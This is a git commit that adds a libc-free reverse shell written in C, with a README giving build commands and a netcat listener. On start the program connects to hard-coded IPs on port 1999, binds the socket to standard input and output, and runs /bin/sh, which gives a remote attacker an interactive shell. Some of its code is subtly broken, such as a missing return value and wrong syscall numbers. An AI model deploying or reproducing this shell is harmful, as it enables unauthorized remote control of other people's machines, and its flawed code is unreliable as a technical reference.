Upload files to "/"

2026-04-06 18:46:52 +00:00 · 2026-04-06 18:46:52 +00:00 · fa99936407
commit fa99936407
parent 985fcf3311
2 changed files with 223 additions and 2 deletions
--- a/README.md
+++ b/README.md
@ -1,3 +1,33 @@
-# Cshell
+# CShell
 a reverse shell in C made without using libc at all
-a reverse shell written in C without using stdlib or libc
+## features
 1- doesnt use libc at all
 2- works on X86 and ARM32 and ARM64 (and untested support for MIPS)
 3- can use multiple servers
 ## how to set up
 1- from the project root, run 
 ```Bash
 gcc -nostdlib -o bcshell bcdshell.c
 ```
 for additional debug output, run
 ```Bash
 gcc -nostdlib -o bcshell bcdshell.c -DDEBUG
 ```
 to define the DEBUG macro
 make sure to put -nostdlib as it has no reliance on libc.
 2- on the server, use netcat with
 ```Bash
 nc -lvp 1999
 ```
 3- on the client, run the binary
 ```Bash
 ./bcshell
 ```
 and see the shell and run it on the server
 ## notes
 1- supports Linux
 2- supports an actual interactive, stateful shell to /bin/sh
 3- binary size is less than 20KB
 4- works on ANY linux device even without libc at all
 5- only supports IPs, not domains
--- a/bcdshell.c
+++ b/bcdshell.c
@ -0,0 +1,191 @@
 /*
 NO STDLIB reverse shell
 supports X86_64, ARM, ARM64
 CAN USE MULTIPLE SERVERS
 to compile:
 gcc -nostdlib -o bcshell bcdshell.c
 (yes, it doesnt use libc, so itll work on a pure linux system with just TCP and syscalls)
 to run on the server:
 nc -lvp 1999
 */
 #define AF_INET      2
 #define SOCK_STREAM  1
 #if defined (__x86_64__) // the syscall numbers on x86_64
 #define SYS_socket   41
 #define SYS_connect  42
 #define SYS_write    1
 #define SYS_exit     60
 #define SYS_fork    57
 #define SYS_execve  59
 #define SYS_pipe    22
 #define SYS_read    0
 #define SYS_close   3
 #define SYS_dup2    33
 #define SYS_wait4   61
 #define SYS_read     0
 #elif defined(__arm__)  // the syscall numbers on 32 bit ARM
 #define SYS_read     3
 #define SYS_write    4
 #define SYS_close    6
 #define SYS_pipe     42
 #define SYS_dup2     63
 #define SYS_socket   281
 #define SYS_connect  283
 #define SYS_fork     2
 #define SYS_execve   11
 #define SYS_exit     1
 #define SYS_wait4    114
 #elif defined(__aarch64__) //the syscall numbers on 64-bit ARM
 #define SYS_read     63
 #define SYS_write    64
 #define SYS_close    57
 #define SYS_pipe     59
 #define SYS_dup2     33   // dup3 is 292, but dup2 is kept for compatibility
 #define SYS_socket   198
 #define SYS_connect  203
 #define SYS_fork     220  // clone is used instead of fork
 #define SYS_execve   221
 #define SYS_exit     93
 #define SYS_wait4    260
 #elif defined(__mips__)
 #define SYS_read      4003
 #define SYS_write     4004
 #define SYS_close     4006
 #define SYS_pipe      4042
 #define SYS_dup2      4063
 #define SYS_wait4     4114
 #define SYS_exit      4001
 #define SYS_fork      4002
 #define SYS_execve    4011
 #define SYS_socket    4183
 #define SYS_connect   4184
 #endif
 #define CMD_SHELL "/bin/sh"
 struct sockaddr_in {
    unsigned short sin_family;
    unsigned short sin_port;
    unsigned int   sin_addr;
    unsigned char pad[8];
 };
    //unsigned char pad[8];
 // Minimal syscall shim for x86-64, it KINDA works tho
 #if defined (__x86_64__)
 static long my_syscall(long n, long a1, long a2, long a3,
                       long a4, long a5, long a6) {
    long ret;
    register long r10 asm("r10") = a4;
    register long r8  asm("r8")  = a5;
    register long r9  asm("r9")  = a6;
    asm volatile("syscall"
                 : "=a"(ret)
                 : "a"(n), "D"(a1), "S"(a2), "d"(a3),
                   "r"(r10), "r"(r8), "r"(r9)
                 : "rcx", "r11", "memory");
    return ret;
 }
 #elif defined(__arm__)
 static inline long my_syscall(long n, long a1, long a2, long a3,
                              long a4, long a5, long a6) {
    register long r0 asm("r0") = a1;
    register long r1 asm("r1") = a2;
    register long r2 asm("r2") = a3;
    register long r3 asm("r3") = a4;
    register long r4 asm("r4") = a5;
    register long r5 asm("r5") = a6;
    register long r7 asm("r7") = n;
    asm volatile("swi 0"
                 : "=r"(r0)
                 : "r"(r0), "r"(r1), "r"(r2), "r"(r3),
                   "r"(r4), "r"(r5), "r"(r7)
                 : "memory");
    return r0;
 }
 #elif defined(__aarch64__)
 static inline long my_syscall(long n, long a1, long a2, long a3,
                              long a4, long a5, long a6) {
    register long x0 asm("x0") = a1;
    register long x1 asm("x1") = a2;
    register long x2 asm("x2") = a3;
    register long x3 asm("x3") = a4;
    register long x4 asm("x4") = a5;
    register long x5 asm("x5") = a6;
    register long x8 asm("x8") = n;
    asm volatile("svc 0"
                 : "+r"(x0)
                 : "r"(x1), "r"(x2), "r"(x3),
                   "r"(x4), "r"(x5), "r"(x8)
                 : "memory");
    return x0;
 }
 #elif defined (__mips__)
 static long my_syscall(long n, long a1, long a2, long a3,
                       long a4, long a5, long a6) {
    long ret;
    asm volatile (
        "subu $sp, $sp, 16\n\t"
        "sw   %5, 0($sp)\n\t"
        "sw   %6, 4($sp)\n\t"
        "syscall\n\t"
        "addiu $sp, $sp, 16\n\t"
        : "=v"(ret)
        : "v"(n), "r"(a1), "r"(a2), "r"(a3), "r"(a4), "r"(a5), "r"(a6)
        : "$a0", "$a1", "$a2", "$a3", "$sp", "memory"
    );
    return ret;
 }
 #endif
 void start_shell(int sock);
 void print(const char *msg);
 int create_socket();
 void cleanup(int exitcode);
 void _start() { // the first function to run, also the true entry point
 struct sockaddr_in servers[] = {
    {AF_INET, __builtin_bswap16(1999), 0x0100007F, {0}}, // 127.0.0.1 on port 1999
    {AF_INET, __builtin_bswap16(1999), 0xC0A80001, {0}}, // 192.168.0.1 on port 1999
    {AF_INET, __builtin_bswap16(1999),  0x0A000001, {0}}, // 10.0.0.1 on port 1999
 };
 int sock = create_socket();
 for (int i = 0; i < sizeof(servers)/sizeof(servers[0]); i++) {
    long ret = my_syscall(SYS_connect, sock, (long)&servers[i], sizeof(servers[i]), 0,0,0);
    if (ret == 0) {
        // success
        #ifdef DEBUG
       const char *msg = "successfully connected!\n"; // dont know why it only prints success
        print(msg);
        #endif
        start_shell(sock);
        break;
    }
    #ifdef DEBUG
    else {
    const char *failmsg = "fail\n";
    print(failmsg);
 }
 #endif
 }
    cleanup(0);
 }
 void start_shell(int sock) {
    // Redirect socket to stdin, stdout, stderr so we get a true interactive terminal
    my_syscall(SYS_dup2, sock, 0,0,0,0,0);
    my_syscall(SYS_dup2, sock, 1,0,0,0,0);
    my_syscall(SYS_dup2, sock, 2,0,0,0,0);
    // Exec a persistent shell for a real terminal experience
    const char *argv[] = { CMD_SHELL, 0 };
    const char *envp[] = { 0 };
    my_syscall(SYS_execve, (long)CMD_SHELL, (long)argv, (long)envp, 0,0,0);
    // If exec fails, cleanup
    cleanup(1);
 }
 void print(const char *msg) {
    my_syscall(SYS_write, 1, (long)msg, sizeof(msg)-1, 0, 0, 0);
    return;
 }
 int create_socket() {
    my_syscall(SYS_socket, AF_INET, SOCK_STREAM, 0,0,0,0);
 }
 void cleanup(int exitcode) { // ye we NEED WRAPPERS, CUZ MANUALLY USING MY_SYSCALL IS GONNA BE A PAIN!
    my_syscall(SYS_exit, exitcode,0,0,0,0,0);
 }